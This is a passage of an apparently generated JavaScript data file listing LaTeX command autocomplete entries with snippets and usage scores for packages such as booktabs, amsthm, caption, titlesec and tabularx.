{ + caption: '\\bottomrule', + snippet: '\\bottomrule', + meta: 'booktabs-cmd', + score: 0.04533364657852219, + }, + { + caption: '\\midrule', + snippet: '\\midrule', + meta: 'booktabs-cmd', + score: 0.07098077735912875, + }, + { + caption: '\\addlinespace', + snippet: '\\addlinespace', + meta: 'booktabs-cmd', + score: 0.005865460617491447, + }, + { + caption: '\\addlinespace[]', + snippet: '\\addlinespace[$1]', + meta: 'booktabs-cmd', + score: 0.005865460617491447, + }, + { + caption: '\\toprule', + snippet: '\\toprule', + meta: 'booktabs-cmd', + score: 0.059857788139528495, + }, + ], + amsfonts: [ + { + caption: '\\frak{}', + snippet: '\\frak{$1}', + meta: 'amsfonts-cmd', + score: 0.0017966000518546787, + }, + { + caption: '\\checkmark', + snippet: '\\checkmark', + meta: 'amsfonts-cmd', + score: 0.025060530944368123, + }, + { + caption: '\\bold', + snippet: '\\bold', + meta: 'amsfonts-cmd', + score: 0.0014358547624941567, + }, + { + caption: '\\bold{}', + snippet: '\\bold{$1}', + meta: 'amsfonts-cmd', + score: 0.0014358547624941567, + }, + { + caption: '\\Bbb{}', + snippet: '\\Bbb{$1}', + meta: 'amsfonts-cmd', + score: 0.0006671850995492977, + }, + { + caption: '\\Bbb', + snippet: '\\Bbb', + meta: 'amsfonts-cmd', + score: 0.0006671850995492977, + }, + ], + float: [ + { + caption: '\\listof{}{}', + snippet: '\\listof{$1}{$2}', + meta: 'float-cmd', + score: 0.0009837365348002915, + }, + { + caption: '\\floatplacement{}{}', + snippet: '\\floatplacement{$1}{$2}', + meta: 'float-cmd', + score: 0.0005815474978918903, + }, + { + caption: '\\restylefloat{}', + snippet: '\\restylefloat{$1}', + meta: 'float-cmd', + score: 0.0008866338267686714, + }, + { + caption: '\\floatstyle{}', + snippet: '\\floatstyle{$1}', + meta: 'float-cmd', + score: 0.0015470917047414941, + }, + { + caption: '\\floatname{}{}', + snippet: '\\floatname{$1}{$2}', + meta: 'float-cmd', + score: 0.0011934321931750752, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'float-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'float-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\newfloat{}{}{}', + snippet: '\\newfloat{$1}{$2}{$3}', + meta: 'float-cmd', + score: 0.0012745874472536625, + }, + { + caption: '\\newfloat', + snippet: '\\newfloat', + meta: 'float-cmd', + score: 0.0012745874472536625, + }, + { + caption: '\\newfloat{}', + snippet: '\\newfloat{$1}', + meta: 'float-cmd', + score: 0.0012745874472536625, + }, + ], + amsthm: [ + { + caption: '\\swapnumbers', + snippet: '\\swapnumbers', + meta: 'amsthm-cmd', + score: 0.0002908376412221364, + }, + { + caption: '\\qedhere', + snippet: '\\qedhere', + meta: 'amsthm-cmd', + score: 0.0001608548097938035, + }, + { + caption: '\\qed', + snippet: '\\qed', + meta: 'amsthm-cmd', + score: 0.0014240748825867814, + }, + { + caption: '\\qed{}', + snippet: '\\qed{$1}', + meta: 'amsthm-cmd', + score: 0.0014240748825867814, + }, + { + caption: '\\newtheoremstyle{}', + snippet: '\\newtheoremstyle{$1}', + meta: 'amsthm-cmd', + score: 0.004259886909451789, + }, + { + caption: '\\newtheoremstyle{}{}{}', + snippet: '\\newtheoremstyle{$1}{$2}{$3}', + meta: 'amsthm-cmd', + score: 0.004259886909451789, + }, + { + caption: '\\newtheoremstyle{}{}{}{}', + snippet: '\\newtheoremstyle{$1}{$2}{$3}{$4}', + meta: 'amsthm-cmd', + score: 0.004259886909451789, + }, + { + caption: '\\theoremstyle{}', + snippet: '\\theoremstyle{$1}', + meta: 'amsthm-cmd', + score: 0.02533412165007986, + }, + { + caption: '\\proofname', + snippet: 
'\\proofname', + meta: 'amsthm-cmd', + score: 0.00021208362094925234, + }, + { + caption: '\\pushQED{}', + snippet: '\\pushQED{$1}', + meta: 'amsthm-cmd', + score: 0.00019346981338869148, + }, + { + caption: '\\qedsymbol', + snippet: '\\qedsymbol', + meta: 'amsthm-cmd', + score: 0.0022671784428571723, + }, + { + caption: '\\qedsymbol{}', + snippet: '\\qedsymbol{$1}', + meta: 'amsthm-cmd', + score: 0.0022671784428571723, + }, + { + caption: '\\popQED', + snippet: '\\popQED', + meta: 'amsthm-cmd', + score: 9.673490669434574e-5, + }, + { + caption: '\\newtheorem{}[]{}', + snippet: '\\newtheorem{$1}[$2]{$3}', + meta: 'amsthm-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}', + snippet: '\\newtheorem{$1}{$2}', + meta: 'amsthm-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}[]', + snippet: '\\newtheorem{$1}{$2}[$3]', + meta: 'amsthm-cmd', + score: 0.215689795055434, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'amsthm-cmd', + score: 0.0063276692758974925, + }, + ], + caption: [ + { + caption: '\\captionsetup{}', + snippet: '\\captionsetup{$1}', + meta: 'caption-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\captionsetup[]{}', + snippet: '\\captionsetup[$1]{$2}', + meta: 'caption-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\captionof{}{}', + snippet: '\\captionof{$1}{$2}', + meta: 'caption-cmd', + score: 0.018348594199161503, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'caption-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\appendix', + snippet: '\\appendix', + meta: 'caption-cmd', + score: 0.047007158741781095, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'caption-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'caption-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\chapter{}', + snippet: '\\chapter{$1}', + meta: 'caption-cmd', + score: 0.422097569591803, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'caption-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\hspace{}', + snippet: '\\hspace{$1}', + meta: 'caption-cmd', + score: 0.3147206476372336, + }, + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'caption-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'caption-cmd', + score: 1.897791904799601, + }, + { + caption: '\\ContinuedFloat', + snippet: '\\ContinuedFloat', + meta: 'caption-cmd', + score: 5.806935368083486e-5, + }, + { + caption: '\\noindent', + snippet: '\\noindent', + meta: 'caption-cmd', + score: 0.42355747798114207, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'caption-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\DeclareCaptionJustification{}{}', + snippet: '\\DeclareCaptionJustification{$1}{$2}', + meta: 'caption-cmd', + score: 0.0001872850414971473, + }, + { + caption: '\\DeclareCaptionLabelSeparator{}{}', + snippet: '\\DeclareCaptionLabelSeparator{$1}{$2}', + meta: 'caption-cmd', + score: 0.0003890810058478364, + }, + { + caption: '\\DeclareCaptionFormat{}{}', + snippet: '\\DeclareCaptionFormat{$1}{$2}', + meta: 'caption-cmd', + score: 0.0004717618449370015, + }, + { + caption: '\\DeclareCaptionFont{}{}', + snippet: '\\DeclareCaptionFont{$1}{$2}', + meta: 'caption-cmd', + score: 5.0133404990680195e-5, + }, + { + caption: '\\DeclareCaptionSubType[]{}', + snippet: '\\DeclareCaptionSubType[$1]{$2}', + 
meta: 'caption-cmd', + score: 0.0001872850414971473, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'caption-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'caption-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\captionsetup{}', + snippet: '\\captionsetup{$1}', + meta: 'caption-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\captionsetup[]{}', + snippet: '\\captionsetup[$1]{$2}', + meta: 'caption-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'caption-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\DeclareCaptionType{}[][]', + snippet: '\\DeclareCaptionType{$1}[$2][$3]', + meta: 'caption-cmd', + score: 0.00015256647321237863, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'caption-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\footnote{}', + snippet: '\\footnote{$1}', + meta: 'caption-cmd', + score: 0.2253056071787701, + }, + { + caption: '\\footnotemark[]', + snippet: '\\footnotemark[$1]', + meta: 'caption-cmd', + score: 0.021473212893597875, + }, + { + caption: '\\footnotemark', + snippet: '\\footnotemark', + meta: 'caption-cmd', + score: 0.021473212893597875, + }, + ], + ifthen: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'ifthen-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'ifthen-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'ifthen-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'ifthen-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'ifthen-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'ifthen-cmd', + score: 0.0018957469739775527, + }, + ], + setspace: [ + { + caption: '\\setstretch{}', + snippet: '\\setstretch{$1}', + meta: 'setspace-cmd', + score: 0.019634763572332112, + }, + { + caption: '\\onehalfspacing', + snippet: '\\onehalfspacing', + meta: 'setspace-cmd', + score: 0.010655415521079565, + }, + { + caption: '\\singlespacing', + snippet: '\\singlespacing', + meta: 'setspace-cmd', + score: 0.008351544612280968, + }, + { + caption: '\\doublespacing', + snippet: '\\doublespacing', + meta: 'setspace-cmd', + score: 0.007835428951987135, + }, + { + caption: '\\baselinestretch', + snippet: '\\baselinestretch', + meta: 'setspace-cmd', + score: 0.03225350148161425, + }, + ], + multirow: [ + { + caption: '\\multirow{}{}{}', + snippet: '\\multirow{$1}{$2}{$3}', + meta: 'multirow-cmd', + score: 0.07525389638751734, + }, + { + caption: '\\multirow{}[]{}{}', + snippet: '\\multirow{$1}[$2]{$3}{$4}', + meta: 'multirow-cmd', + score: 0.07525389638751734, + }, + ], + array: [ + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'array-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'array-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'array-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'array-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 
'array-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'array-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'array-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'array-cmd', + score: 0.018615449342361392, + }, + ], + titlesec: [ + { + caption: '\\titleclass{}{}[]', + snippet: '\\titleclass{$1}{$2}[$3]', + meta: 'titlesec-cmd', + score: 0.00028979763314974667, + }, + { + caption: '\\titlelabel{}', + snippet: '\\titlelabel{$1}', + meta: 'titlesec-cmd', + score: 6.40387839367932e-6, + }, + { + caption: '\\thetitle', + snippet: '\\thetitle', + meta: 'titlesec-cmd', + score: 0.0015531478302713473, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'titlesec-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'titlesec-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\titleformat{}{}{}{}{}[]', + snippet: '\\titleformat{$1}{$2}{$3}{$4}{$5}[$6]', + meta: 'titlesec-cmd', + score: 0.03475519439740096, + }, + { + caption: '\\titleformat{}[]{}{}{}{}', + snippet: '\\titleformat{$1}[$2]{$3}{$4}{$5}{$6}', + meta: 'titlesec-cmd', + score: 0.03475519439740096, + }, + { + caption: '\\titleformat{}{}', + snippet: '\\titleformat{$1}{$2}', + meta: 'titlesec-cmd', + score: 0.03475519439740096, + }, + { + caption: '\\titleformat{}{}{}{}{}', + snippet: '\\titleformat{$1}{$2}{$3}{$4}{$5}', + meta: 'titlesec-cmd', + score: 0.03475519439740096, + }, + { + caption: '\\titlespacing{}{}{}{}', + snippet: '\\titlespacing{$1}{$2}{$3}{$4}', + meta: 'titlesec-cmd', + score: 0.023062744385192156, + }, + { + caption: '\\markboth{}{}', + snippet: '\\markboth{$1}{$2}', + meta: 'titlesec-cmd', + score: 0.038323601301945065, + }, + { + caption: '\\markboth{}', + snippet: '\\markboth{$1}', + meta: 'titlesec-cmd', + score: 0.038323601301945065, + }, + { + caption: '\\markright{}', + snippet: '\\markright{$1}', + meta: 'titlesec-cmd', + score: 0.007138622674767024, + }, + { + caption: '\\markright{}{}', + snippet: '\\markright{$1}{$2}', + meta: 'titlesec-cmd', + score: 0.007138622674767024, + }, + { + caption: '\\filleft', + snippet: '\\filleft', + meta: 'titlesec-cmd', + score: 7.959989906732799e-5, + }, + { + caption: '\\filcenter', + snippet: '\\filcenter', + meta: 'titlesec-cmd', + score: 0.0004835660211260246, + }, + { + caption: '\\footnote{}', + snippet: '\\footnote{$1}', + meta: 'titlesec-cmd', + score: 0.2253056071787701, + }, + { + caption: '\\cleardoublepage', + snippet: '\\cleardoublepage', + meta: 'titlesec-cmd', + score: 0.044016804142963585, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'titlesec-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\chaptertitlename', + snippet: '\\chaptertitlename', + meta: 'titlesec-cmd', + score: 0.0016985007766926272, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'titlesec-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\filright', + snippet: '\\filright', + meta: 'titlesec-cmd', + score: 7.959989906732799e-5, + }, + { + caption: '\\titlerule', + snippet: '\\titlerule', + meta: 'titlesec-cmd', + score: 0.019273712561461216, + }, + { + caption: '\\titlerule[]{}', + snippet: '\\titlerule[$1]{$2}', + meta: 'titlesec-cmd', + score: 0.019273712561461216, + }, + ], + multicol: [ + { + caption: '\\expandafter', + snippet: 
'\\expandafter', + meta: 'multicol-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'multicol-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\raggedcolumns', + snippet: '\\raggedcolumns', + meta: 'multicol-cmd', + score: 0.00027461965178228156, + }, + { + caption: '\\columnbreak', + snippet: '\\columnbreak', + meta: 'multicol-cmd', + score: 0.002609610141555795, + }, + { + caption: '\\columnseprulecolor{}', + snippet: '\\columnseprulecolor{$1}', + meta: 'multicol-cmd', + score: 1.3314892207625771e-5, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'multicol-cmd', + score: 0.1789117552185788, + }, + ], + listings: [ + { + caption: '\\vskip', + snippet: '\\vskip', + meta: 'listings-cmd', + score: 0.05143052892347224, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'listings-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'listings-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'listings-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\thelstlisting', + snippet: '\\thelstlisting', + meta: 'listings-cmd', + score: 0.00012774128088872144, + }, + { + caption: '\\lstinputlisting[]{}', + snippet: '\\lstinputlisting[$1]{$2}', + meta: 'listings-cmd', + score: 0.011660477607086044, + }, + { + caption: '\\lstinputlisting{}', + snippet: '\\lstinputlisting{$1}', + meta: 'listings-cmd', + score: 0.011660477607086044, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'listings-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'listings-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\lstinline', + snippet: '\\lstinline', + meta: 'listings-cmd', + score: 0.005972262850694285, + }, + { + caption: '\\lstinline{}', + snippet: '\\lstinline{$1}', + meta: 'listings-cmd', + score: 0.005972262850694285, + }, + { + caption: '\\lstlistoflistings', + snippet: '\\lstlistoflistings', + meta: 'listings-cmd', + score: 0.005279080363360602, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'listings-cmd', + score: 0.00037306820619479756, + }, + ], + blindtext: [ + { + caption: '\\glqq', + snippet: '\\glqq', + meta: 'blindtext-cmd', + score: 0.0039133256714254504, + }, + { + caption: '\\glqq{}', + snippet: '\\glqq{$1}', + meta: 'blindtext-cmd', + score: 0.0039133256714254504, + }, + { + caption: '\\blindtext', + snippet: '\\blindtext', + meta: 'blindtext-cmd', + score: 0.05782040856823667, + }, + { + caption: '\\blindtext[]', + snippet: '\\blindtext[$1]', + meta: 'blindtext-cmd', + score: 0.05782040856823667, + }, + { + caption: '\\Blindtext', + snippet: '\\Blindtext', + meta: 'blindtext-cmd', + score: 0.006384906903938044, + }, + { + caption: '\\grqq', + snippet: '\\grqq', + meta: 'blindtext-cmd', + score: 0.006659522189248266, + }, + { + caption: '\\grqq{}', + snippet: '\\grqq{$1}', + meta: 'blindtext-cmd', + score: 0.006659522189248266, + }, + { + caption: '\\blinddocument', + snippet: '\\blinddocument', + meta: 'blindtext-cmd', + score: 0.00011480988129172825, + }, + { + caption: '\\xspace', + snippet: '\\xspace', + meta: 'blindtext-cmd', + score: 0.07560370351316588, + }, + ], + enumitem: [ + { + caption: '\\newlist{}{}{}', + snippet: '\\newlist{$1}{$2}{$3}', + meta: 'enumitem-cmd', + score: 0.0007266225924074459, + }, + { + caption: '\\setlist[]{}', + snippet: 
'\\setlist[$1]{$2}', + meta: 'enumitem-cmd', + score: 0.010895384475728338, + }, + { + caption: '\\setlist{}', + snippet: '\\setlist{$1}', + meta: 'enumitem-cmd', + score: 0.010895384475728338, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'enumitem-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'enumitem-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\setlistdepth{}', + snippet: '\\setlistdepth{$1}', + meta: 'enumitem-cmd', + score: 0.0001113322912630871, + }, + { + caption: '\\setenumerate[]{}', + snippet: '\\setenumerate[$1]{$2}', + meta: 'enumitem-cmd', + score: 7.437178301071255e-5, + }, + { + caption: '\\setenumerate{}', + snippet: '\\setenumerate{$1}', + meta: 'enumitem-cmd', + score: 7.437178301071255e-5, + }, + { + caption: '\\renewlist{}{}{}', + snippet: '\\renewlist{$1}{$2}{$3}', + meta: 'enumitem-cmd', + score: 0.0001113322912630871, + }, + { + caption: '\\descriptionlabel{}', + snippet: '\\descriptionlabel{$1}', + meta: 'enumitem-cmd', + score: 7.678089052626698e-6, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'enumitem-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\setitemize[]{}', + snippet: '\\setitemize[$1]{$2}', + meta: 'enumitem-cmd', + score: 0.0019580640711971786, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'enumitem-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'enumitem-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\makelabel', + snippet: '\\makelabel', + meta: 'enumitem-cmd', + score: 5.739925426740175e-5, + }, + { + caption: '\\makelabel{}', + snippet: '\\makelabel{$1}', + meta: 'enumitem-cmd', + score: 5.739925426740175e-5, + }, + { + caption: '\\makelabel[]{}', + snippet: '\\makelabel[$1]{$2}', + meta: 'enumitem-cmd', + score: 5.739925426740175e-5, + }, + ], + times: [ + { + caption: '\\rmdefault', + snippet: '\\rmdefault', + meta: 'times-cmd', + score: 0.0012870877747432935, + }, + { + caption: '\\sfdefault', + snippet: '\\sfdefault', + meta: 'times-cmd', + score: 0.008427383388519996, + }, + { + caption: '\\sfdefault{}', + snippet: '\\sfdefault{$1}', + meta: 'times-cmd', + score: 0.008427383388519996, + }, + { + caption: '\\ttdefault', + snippet: '\\ttdefault', + meta: 'times-cmd', + score: 0.0011733254149332488, + }, + { + caption: '\\ttdefault{}', + snippet: '\\ttdefault{$1}', + meta: 'times-cmd', + score: 0.0011733254149332488, + }, + ], + subcaption: [ + { + caption: '\\subref{}', + snippet: '\\subref{$1}', + meta: 'subcaption-cmd', + score: 0.007192033516871399, + }, + { + caption: '\\subcaptionbox{}{}', + snippet: '\\subcaptionbox{$1}{$2}', + meta: 'subcaption-cmd', + score: 0.0008634329663023698, + }, + { + caption: '\\newsubfloat{}', + snippet: '\\newsubfloat{$1}', + meta: 'subcaption-cmd', + score: 0.000615805121082521, + }, + { + caption: '\\subcaption{}', + snippet: '\\subcaption{$1}', + meta: 'subcaption-cmd', + score: 0.006820005741581297, + }, + { + caption: '\\subcaption[]{}', + snippet: '\\subcaption[$1]{$2}', + meta: 'subcaption-cmd', + score: 0.006820005741581297, + }, + { + caption: '\\captionsetup{}', + snippet: '\\captionsetup{$1}', + meta: 'subcaption-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\captionsetup[]{}', + snippet: '\\captionsetup[$1]{$2}', + meta: 'subcaption-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\captionof{}{}', + snippet: '\\captionof{$1}{$2}', + meta: 
'subcaption-cmd', + score: 0.018348594199161503, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'subcaption-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\appendix', + snippet: '\\appendix', + meta: 'subcaption-cmd', + score: 0.047007158741781095, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'subcaption-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'subcaption-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\chapter{}', + snippet: '\\chapter{$1}', + meta: 'subcaption-cmd', + score: 0.422097569591803, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'subcaption-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\hspace{}', + snippet: '\\hspace{$1}', + meta: 'subcaption-cmd', + score: 0.3147206476372336, + }, + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'subcaption-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'subcaption-cmd', + score: 1.897791904799601, + }, + { + caption: '\\ContinuedFloat', + snippet: '\\ContinuedFloat', + meta: 'subcaption-cmd', + score: 5.806935368083486e-5, + }, + { + caption: '\\noindent', + snippet: '\\noindent', + meta: 'subcaption-cmd', + score: 0.42355747798114207, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'subcaption-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\DeclareCaptionJustification{}{}', + snippet: '\\DeclareCaptionJustification{$1}{$2}', + meta: 'subcaption-cmd', + score: 0.0001872850414971473, + }, + { + caption: '\\DeclareCaptionLabelSeparator{}{}', + snippet: '\\DeclareCaptionLabelSeparator{$1}{$2}', + meta: 'subcaption-cmd', + score: 0.0003890810058478364, + }, + { + caption: '\\DeclareCaptionFormat{}{}', + snippet: '\\DeclareCaptionFormat{$1}{$2}', + meta: 'subcaption-cmd', + score: 0.0004717618449370015, + }, + { + caption: '\\DeclareCaptionFont{}{}', + snippet: '\\DeclareCaptionFont{$1}{$2}', + meta: 'subcaption-cmd', + score: 5.0133404990680195e-5, + }, + { + caption: '\\DeclareCaptionSubType[]{}', + snippet: '\\DeclareCaptionSubType[$1]{$2}', + meta: 'subcaption-cmd', + score: 0.0001872850414971473, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'subcaption-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'subcaption-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\captionsetup{}', + snippet: '\\captionsetup{$1}', + meta: 'subcaption-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\captionsetup[]{}', + snippet: '\\captionsetup[$1]{$2}', + meta: 'subcaption-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'subcaption-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\DeclareCaptionType{}[][]', + snippet: '\\DeclareCaptionType{$1}[$2][$3]', + meta: 'subcaption-cmd', + score: 0.00015256647321237863, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'subcaption-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\footnote{}', + snippet: '\\footnote{$1}', + meta: 'subcaption-cmd', + score: 0.2253056071787701, + }, + { + caption: '\\footnotemark[]', + snippet: '\\footnotemark[$1]', + meta: 'subcaption-cmd', + score: 0.021473212893597875, + }, + { + caption: '\\footnotemark', + snippet: '\\footnotemark', + meta: 'subcaption-cmd', + score: 0.021473212893597875, + }, + ], + bm: [ + { 
+ caption: '\\bm{}', + snippet: '\\bm{$1}', + meta: 'bm-cmd', + score: 0.14733018077819282, + }, + { + caption: '\\bm', + snippet: '\\bm', + meta: 'bm-cmd', + score: 0.14733018077819282, + }, + ], + fontspec: [ + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'fontspec-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'fontspec-cmd', + score: 0.2864294797053033, + }, + ], + subfigure: [ + { + caption: '\\subref{}', + snippet: '\\subref{$1}', + meta: 'subfigure-cmd', + score: 0.007192033516871399, + }, + { + caption: '\\subfigure[]{}', + snippet: '\\subfigure[$1]{$2}', + meta: 'subfigure-cmd', + score: 0.037856842641104005, + }, + ], + calc: [ + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'calc-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'calc-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'calc-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'calc-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'calc-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'calc-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'calc-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'calc-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'calc-cmd', + score: 0.028955796305270766, + }, + ], + tabularx: [ + { + caption: '\\let', + snippet: '\\let', + meta: 'tabularx-cmd', + score: 0.03789745970461662, + }, + { + caption: '\\write', + snippet: '\\write', + meta: 'tabularx-cmd', + score: 0.0008038857295393196, + }, + { + caption: '\\tabularxcolumn[]{}', + snippet: '\\tabularxcolumn[$1]{$2}', + meta: 'tabularx-cmd', + score: 0.00048507499766588637, + }, + { + caption: '\\tabularxcolumn', + snippet: '\\tabularxcolumn', + meta: 'tabularx-cmd', + score: 0.00048507499766588637, + }, + { + caption: '\\tabularx{}{}', + snippet: '\\tabularx{$1}{$2}', + meta: 'tabularx-cmd', + score: 0.0005861357565780464, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'tabularx-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'tabularx-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'tabularx-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'tabularx-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'tabularx-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'tabularx-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tabularx-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'tabularx-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'tabularx-cmd', + score: 
